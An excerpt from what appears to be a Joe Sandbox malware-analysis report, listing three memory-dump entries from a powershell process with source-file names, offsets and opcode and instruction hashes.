                                                                                                                        • Source File: 00000002.00000002.1449865277.00007FF887D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D40000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_7ff887d40000_powershell.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 1ff54395f53e63370637bc3cdb93d8185d8a4d81d0192464b4d1f56641a5f218
                                                                                                                        • Instruction ID: 937dce9264cffee7fa11e25b959890350788c1a14a42d01aca979f6098e2f5f5
                                                                                                                        • Opcode Fuzzy Hash: 1ff54395f53e63370637bc3cdb93d8185d8a4d81d0192464b4d1f56641a5f218
                                                                                                                        • Instruction Fuzzy Hash: 4C413731D4CA898FEB489B5CA80A6AC7BE0FF65310F14426FD08D93297DA64AC15C7C6
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1449865277.00007FF887D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D40000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_7ff887d40000_powershell.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 75ce1a6f34cb4dc0042f392882733269e0c2ac20e3138010d4fdc5caff159a1d
                                                                                                                        • Instruction ID: 92df3a2593b42a5646b4bd41cb5b706211312e22d9f44835289510d9db96a688
                                                                                                                        • Opcode Fuzzy Hash: 75ce1a6f34cb4dc0042f392882733269e0c2ac20e3138010d4fdc5caff159a1d
                                                                                                                        • Instruction Fuzzy Hash: 50213A3090C74C4FDB49DBACD84A7E97BF0EB96320F04426BD04DC3156DA74A44ACB92
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1449865277.00007FF887D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D40000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_7ff887d40000_powershell.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                                                                        • Instruction ID: 83cd4f4bedffc5a25eafb7a7ce6657c8cca97258bc3b2f5d6432f61465602472
                                                                                                                        • Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                                                                        • Instruction Fuzzy Hash: 6001677115CB0C4FD744EF0CE451AA9B7E0FB95364F10056DE58AC3655DA36E882CB46